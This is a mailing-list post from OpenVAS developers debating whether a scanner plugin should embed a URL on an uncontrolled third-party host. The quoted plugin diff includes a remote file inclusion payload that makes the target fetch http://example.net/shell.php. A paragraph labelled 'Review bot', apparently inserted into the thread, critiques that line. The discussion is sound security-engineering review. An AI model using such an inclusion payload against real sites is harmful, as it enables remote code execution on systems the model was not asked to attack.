> I really don't think that plugins should be running with references
> to injection code that is hosted on an uncontrolled 3rd party site.
> That allows for introducing untrusted code into the scanner.

...

> >    trunk/openvas-plugins/scripts/gb_dm_filemanager_file_inc_vuln.nasl
> 
> > +  sndReq = http_get(item:dmfVer[2] + "/dm-albums/template/album.php?" +
> > +                    "SECURITY_FILE=http://example.net/shell.php";,
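Review bot: The SECURITY_FILE parameter on the second added line is hard-coded to http://example.net/shell.php, a URL on a host that is neither the scan target nor under the scanner operator's control, so the outcome of the check depends on whatever that third-party host serves at scan time. I would suggest not embedding an external URL in the plugin: take the value from a scanner-side setting that defaults to something the operator controls, and add a comment stating which response from the target is taken as evidence of the file inclusion. Separately, the `;` between the closing quote and the comma on that line looks like a stray character and should be checked against the committed file.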

Does that code work?  I was under the impression that a network connection
to a third host was prohibited by the scanning engine (that is, the scanning
engine would connect only to the target host to be scanned on a script by
script basis).

If that does work, I wholeheartedly agree with Thomas.  Connections to
remote sites are risky.  Perhaps allowing connections to alternate hosts
within the same network would be ok... but connecting out from the target
network should be a big no-no.

-geoff


---------------------------------
Geoff Galitz
Blankenheim NRW, Germany
http://www.galitz.org/
http://german-way.com/blog/



_______________________________________________
Openvas-devel mailing list
Openvas-devel@wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-devel
